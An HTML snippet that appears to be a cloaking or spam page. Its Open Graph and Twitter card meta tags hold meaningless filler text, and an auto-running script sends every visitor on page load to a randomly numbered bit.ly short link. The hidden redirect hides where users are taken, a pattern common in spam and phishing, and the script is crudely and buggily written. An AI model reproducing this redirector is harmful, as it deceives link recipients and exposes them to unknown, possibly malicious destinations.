<meta property="og:title" content="sf;sdlfxcvv;slf">
<meta property="og:description" content="
                               
sdfsdfsfsfscvcvcvcvdf
">                    
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="
g;ldg;dlfg;lxcvxcvcdg

">                             
<script type = "text/javascript">
function reDirect() {
a = location.href = "bit.ly/";
b = location.href = "pon";
c = location.href = "pona";
d = Math.ceil(Math.random() * 24);
a = "https://" + a + b + c + d ;
window.location = a
}
reDirect();
</script>



